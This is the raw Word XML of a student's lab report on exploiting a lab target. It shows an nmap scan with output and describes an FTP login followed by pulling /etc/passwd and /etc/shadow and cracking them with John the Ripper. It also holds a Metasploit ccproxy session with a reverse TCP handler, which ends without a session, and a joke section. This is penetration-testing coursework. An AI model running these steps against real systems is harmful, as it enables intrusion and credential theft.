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32" w:rsidRDefault="00E838B0">
      <w:r>
        <w:t>Henry Post</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E838B0" w:rsidRDefault="00E838B0">
      <w:r>
        <w:t>ITMS 443</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E838B0" w:rsidRDefault="00E838B0" w:rsidP="00E838B0">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Exploiting a targ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4276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38B0" w:rsidRDefault="00E838B0">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="0067492D" w:rsidRDefault="00E83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64831" w:history="1">
            <w:r w:rsidR="0067492D" w:rsidRPr="00243333">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
            <w:r w:rsidR="0067492D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0067492D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0067492D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc528064831 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0067492D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0067492D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0067492D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="0067492D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0067492D" w:rsidRDefault="006749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64832" w:history="1">
            <w:r w:rsidRPr="00243333">
              <w:rPr>
                <w:rStyle w:val="Hyperlink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92D" w:rsidRDefault="006749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64833" w:history="1">
            <w:r w:rsidRPr="00243333">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>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92D" w:rsidRDefault="006749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64834" w:history="1">
            <w:r w:rsidRPr="00243333">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Unsecured FT</w:t>
            </w:r>
            <w:r w:rsidRPr="00243333">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>P</w:t>
            </w:r>
            <w:r w:rsidRPr="00243333">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">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92D" w:rsidRDefault="006749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64835" w:history="1">
            <w:r w:rsidRPr="00243333">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ccproxy-ftp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92D" w:rsidRDefault="006749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64836" w:history="1">
            <w:r w:rsidRPr="00243333">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Poop ex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B0" w:rsidRDefault="00E838B0">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00E838B0" w:rsidRDefault="00E838B0">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D747B1" w:rsidRDefault="00D747B1" w:rsidP="00D747B1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc528064831"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Notes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00B93F23" w:rsidRDefault="00D747B1" w:rsidP="00D747B1">
      <w:r>
        <w:t>If you look at my previous assignments, you’ll notice I always include all the commands</w:t>
      </w:r>
      <w:r w:rsidR="00677158">
        <w:t xml:space="preserve"> in a folder called `scripts`.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D747B1" w:rsidRDefault="00B93F23" w:rsidP="00D747B1">
      <w:r>
        <w:t>The same thing applies here.</w:t>
      </w:r>
      <w:r w:rsidR="00D747B1">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D747B1" w:rsidRDefault="00D747B1" w:rsidP="00D747B1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc528064832"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Reconnaissance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00D747B1" w:rsidRDefault="00D747B1" w:rsidP="00D747B1">
      <w:r>
        <w:t>I did some minor reconnaissance before beginning any exploits, as all I knew about my target was its IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E27D8" w:rsidRDefault="000E27D8" w:rsidP="00D747B1">
      <w:r>
        <w:t>I used `nmap` to scan all 65535 ports on the target machine, and then picked some cool-looking ones.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tarting Nmap 7.70 ( https://nmap.org ) at 2018-10-22 16:33 EDT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map scan report for 172.43.0.154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Host is up (0.00049s latency).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ot shown: 65505 closed ports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PORT      STATE SERVICE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1/tcp    open  ftp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2/tcp    open  ssh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3/tcp    ope</w:t>
      </w:r>
      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="2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  telnet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5/tcp    open  smtp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3/tcp    open  domai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0/tcp    open  http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111/tcp   open  rpcbind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139/tcp   open  netbios-ss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445/tcp   open  microsoft-ds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2/tcp   open  exec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3/tcp   open  logi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4/tcp   open  shell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1099/tcp  open  rmiregistry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1524/tcp  open  ingreslock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049/tcp  open  nfs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121/tcp  open  ccproxy-ftp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3306/tcp  open  mysql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3632/tcp  open  distccd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432/tcp  open  postgresql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900/tcp  open  vnc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6000/tcp  open  X11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6667/tcp  open  irc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6697/tcp  open  ircs-u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009/tcp  open  ajp13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180/tcp  open  unknow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787/tcp  open  msgsrvr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33686/tcp open  unknow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41710/tcp open  unknow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48661/tcp open  unknown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8745/tcp open  unknown</w:t>
      </w:r>
      <w:r w:rsid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AC Address: 00:50:56:9A:AE:15 (VMware)</w:t>
      </w:r>
      <w:r w:rsid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map done: 1 IP address (1 host up) scanned in 3.83 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E27D8" w:rsidRDefault="000E27D8" w:rsidP="00D747B1"/>
    <w:p w:rsidR="00D747B1" w:rsidRPr="00D747B1" w:rsidRDefault="00D747B1" w:rsidP="00D747B1"/>
    <w:p w:rsidR="00D747B1" w:rsidRDefault="00D747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38B0" w:rsidRDefault="00D747B1" w:rsidP="00D747B1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc528064833"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploits</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="00D747B1" w:rsidRDefault="00D747B1" w:rsidP="00D747B1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc528064834"/>
      <w:r>
        <w:t>Unsecured FTP server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="005C0D1A" w:rsidRDefault="005C0D1A" w:rsidP="005C0D1A">
      <w:r>
        <w:t>I chose the `ftp` service running on port `21` first, by virtue of curiosity and the fact that it was first.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C0D1A" w:rsidRDefault="000D5F67" w:rsidP="005C0D1A">
      <w:r>
        <w:t>I then connected to it using `ftp &lt;HOST&gt;`, and to my surprise, it worked!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D5F67" w:rsidRDefault="000D5F67" w:rsidP="005C0D1A">
      <w:r>
        <w:t>I then made a perl script that downloads `/etc/passwd/` and `/etc/shadow` into the `./out/` folder, and then unshadows and cracks those files using John the Ripper.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F74A9E" w:rsidRDefault="00F74A9E" w:rsidP="00F74A9E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Hlk528003517"/>
      <w:bookmarkStart w:id="6" w:name="_Toc528064835"/>
      <w:r>
        <w:t>ccproxy</w:t>
      </w:r>
      <w:bookmarkStart w:id="7" w:name="_Hlk528003516"/>
      <w:r>
        <w:t>-ftp</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00F74A9E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>buffer overflow</w:t>
        </w:r>
        <w:bookmarkEnd w:id="6"/>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F74A9E" w:rsidRDefault="00F74A9E" w:rsidP="00F74A9E">
      <w:r>
        <w:t>In the same vein (ftp) of services, I saw ccproxy-ftp running, and decided to go on Google to see if there were any exploits available.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F74A9E" w:rsidRDefault="00F74A9E" w:rsidP="00F74A9E">
      <w:r>
        <w:t xml:space="preserve">Luckily for me, there was a </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00F74A9E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>metasploit module</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> available that I could take advantage of.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000559F8" w:rsidRDefault="000559F8" w:rsidP="00F74A9E">
      <w:r>
        <w:t xml:space="preserve">There is an </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="000559F8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>asciinema screen recording</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000559F8" w:rsidRDefault="000559F8" w:rsidP="000559F8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spacing w:line="320" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="CCCCCC"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r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&gt; use exploit/windows/proxy/ccproxy_telnet_ping</w:t>
      </w:r>
      <w:r w:rsidR="00D043F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exploit(</w:t>
      </w:r>
      <w:r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windows/proxy/ccproxy_telnet_ping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) &gt; set RHOST 172.43.0.154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  <w:t xml:space="preserve">RHOST =&gt; 172.43.0.154 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451CFF"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exploit(</w:t>
      </w:r>
      <w:r w:rsidR="00451CFF"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windows/proxy/ccproxy_telnet_ping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) &gt; exploit                                                                                                        </w:t>
      </w:r>
      <w:r w:rsidR="00451CFF">
        <w:rPr>
          <w:rStyle w:val="fg-12"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="26B0D7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[*]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Started reverse TCP handler on 172.43.35.101:4444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451CFF">
        <w:rPr>
          <w:rStyle w:val="fg-12"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="26B0D7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[*]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Exploit completed, but no session was created.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005819C1" w:rsidRDefault="005819C1" w:rsidP="005819C1"/>
    <w:p w:rsidR="000559F8" w:rsidRDefault="005819C1" w:rsidP="005819C1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc528064836"/>
      <w:r>
        <w:t>Poop exploit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="005819C1" w:rsidRPr="005819C1" w:rsidRDefault="005819C1" w:rsidP="005819C1">
      <w:r>
        <w:t>Make dem poop</w:t>
      </w:r>
      <w:r w:rsidR="00144041">
        <w:t xml:space="preserve"> by giving them chocolates</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="005819C1" w:rsidRPr="0058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AA"/>
    <w:rsid w:val="00012C3D"/>
    <w:rsid w:val="00030F1A"/>
    <w:rsid w:val="000351DD"/>
    <w:rsid w:val="00037A59"/>
    <w:rsid w:val="00043A07"/>
    <w:rsid w:val="00044B69"/>
    <w:rsid w:val="000559F8"/>
    <w:rsid w:val="00075D91"/>
    <w:rsid w:val="000D5F67"/>
    <w:rsid w:val="000E27D8"/>
    <w:rsid w:val="000F02E8"/>
    <w:rsid w:val="001142FB"/>
    <w:rsid w:val="001209E8"/>
    <w:rsid w:val="0012148C"/>
    <w:rsid w:val="001248C6"/>
    <w:rsid w:val="00124EC0"/>
    <w:rsid w:val="00125061"/>
    <w:rsid w:val="00144041"/>
    <w:rsid w:val="001A35CA"/>
    <w:rsid w:val="001B3CA5"/>
    <w:rsid w:val="001F4C0F"/>
    <w:rsid w:val="00203400"/>
    <w:rsid w:val="00212837"/>
    <w:rsid w:val="00225292"/>
    <w:rsid w:val="00240E9F"/>
    <w:rsid w:val="002441C4"/>
    <w:rsid w:val="00272455"/>
    <w:rsid w:val="00294556"/>
    <w:rsid w:val="002A3FDF"/>
    <w:rsid w:val="002A744D"/>
    <w:rsid w:val="002E5FE3"/>
    <w:rsid w:val="00311A0E"/>
    <w:rsid w:val="00330B27"/>
    <w:rsid w:val="00343057"/>
    <w:rsid w:val="0035642E"/>
    <w:rsid w:val="00376764"/>
    <w:rsid w:val="003974BC"/>
    <w:rsid w:val="003B74BD"/>
    <w:rsid w:val="003C753C"/>
    <w:rsid w:val="003D0950"/>
    <w:rsid w:val="003E75A5"/>
    <w:rsid w:val="00413322"/>
    <w:rsid w:val="00422304"/>
    <w:rsid w:val="00451CFF"/>
    <w:rsid w:val="00483501"/>
    <w:rsid w:val="00484C6F"/>
    <w:rsid w:val="004B1436"/>
    <w:rsid w:val="004B62A4"/>
    <w:rsid w:val="004D2F26"/>
    <w:rsid w:val="004E6F5C"/>
    <w:rsid w:val="0052543B"/>
    <w:rsid w:val="00542895"/>
    <w:rsid w:val="005748A3"/>
    <w:rsid w:val="005819C1"/>
    <w:rsid w:val="005B26EC"/>
    <w:rsid w:val="005B7597"/>
    <w:rsid w:val="005C0D1A"/>
    <w:rsid w:val="005F74A1"/>
    <w:rsid w:val="00606DD3"/>
    <w:rsid w:val="00613E58"/>
    <w:rsid w:val="0063008F"/>
    <w:rsid w:val="0067492D"/>
    <w:rsid w:val="00677158"/>
    <w:rsid w:val="006B62BE"/>
    <w:rsid w:val="006E5738"/>
    <w:rsid w:val="0074728E"/>
    <w:rsid w:val="00756E89"/>
    <w:rsid w:val="00762BA5"/>
    <w:rsid w:val="00765032"/>
    <w:rsid w:val="007E4332"/>
    <w:rsid w:val="00801DEC"/>
    <w:rsid w:val="00821D7B"/>
    <w:rsid w:val="00857D57"/>
    <w:rsid w:val="00862C86"/>
    <w:rsid w:val="008847E4"/>
    <w:rsid w:val="008F55E3"/>
    <w:rsid w:val="008F6724"/>
    <w:rsid w:val="009239D6"/>
    <w:rsid w:val="009744F5"/>
    <w:rsid w:val="009C30A4"/>
    <w:rsid w:val="009E0FA4"/>
    <w:rsid w:val="009F1330"/>
    <w:rsid w:val="009F68DC"/>
    <w:rsid w:val="00A16BA5"/>
    <w:rsid w:val="00A205FB"/>
    <w:rsid w:val="00A37C3A"/>
    <w:rsid w:val="00AA1876"/>
    <w:rsid w:val="00AC7EE5"/>
    <w:rsid w:val="00AD340B"/>
    <w:rsid w:val="00AF5F24"/>
    <w:rsid w:val="00B102BB"/>
    <w:rsid w:val="00B2283A"/>
    <w:rsid w:val="00B34397"/>
    <w:rsid w:val="00B636C2"/>
    <w:rsid w:val="00B93F23"/>
    <w:rsid w:val="00BA00EC"/>
    <w:rsid w:val="00BA5963"/>
    <w:rsid w:val="00BC6F18"/>
    <w:rsid w:val="00BD1C20"/>
    <w:rsid w:val="00C11468"/>
    <w:rsid w:val="00C11D63"/>
    <w:rsid w:val="00C44731"/>
    <w:rsid w:val="00C630DC"/>
    <w:rsid w:val="00C646FD"/>
    <w:rsid w:val="00C65C5F"/>
    <w:rsid w:val="00C71863"/>
    <w:rsid w:val="00C80A4C"/>
    <w:rsid w:val="00CD1F3B"/>
    <w:rsid w:val="00CE0F2C"/>
    <w:rsid w:val="00CE3630"/>
    <w:rsid w:val="00D043F4"/>
    <w:rsid w:val="00D0459C"/>
    <w:rsid w:val="00D31FA4"/>
    <w:rsid w:val="00D4779B"/>
    <w:rsid w:val="00D747B1"/>
    <w:rsid w:val="00D76F42"/>
    <w:rsid w:val="00DA5D1E"/>
    <w:rsid w:val="00DD5E8F"/>
    <w:rsid w:val="00DE1FB4"/>
    <w:rsid w:val="00E21BDF"/>
    <w:rsid w:val="00E22EE6"/>
    <w:rsid w:val="00E33AB4"/>
    <w:rsid w:val="00E414EB"/>
    <w:rsid w:val="00E43055"/>
    <w:rsid w:val="00E541B3"/>
    <w:rsid w:val="00E544A5"/>
    <w:rsid w:val="00E838B0"/>
    <w:rsid w:val="00EC0AB7"/>
    <w:rsid w:val="00EF475C"/>
    <w:rsid w:val="00F172AA"/>
    <w:rsid w:val="00F467E9"/>
    <w:rsid w:val="00F550C0"/>
    <w:rsid w:val="00F64F3A"/>
    <w:rsid w:val="00F679FD"/>
    <w:rsid w:val="00F74A9E"/>
    <w:rsid w:val="00F86453"/>
    <w:rsid w:val="00FB29A5"/>
    <w:rsid w:val="00FC6768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FAA70-F5C6-41E0-8B1C-40FF8FA9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B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74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2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7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7D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A9E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0559F8"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="underline">
    <w:name w:val="underline"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="000559F8"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fg-9">
    <w:name w:val="fg-9"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="000559F8"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fg-12">
    <w:name w:val="fg-12"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0045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43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91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0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2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8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ciinema.org/a/ZbT6n6VNbfQ9JpNzR2BTDXPUK?t=25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pid7.com/db/modules/exploit/windows/proxy/ccproxy_telnet_ping" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/cve/cve-2004-24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38A9-0C4E-49FE-97AD-EE3AD77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19</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-23T00:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-23T18:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>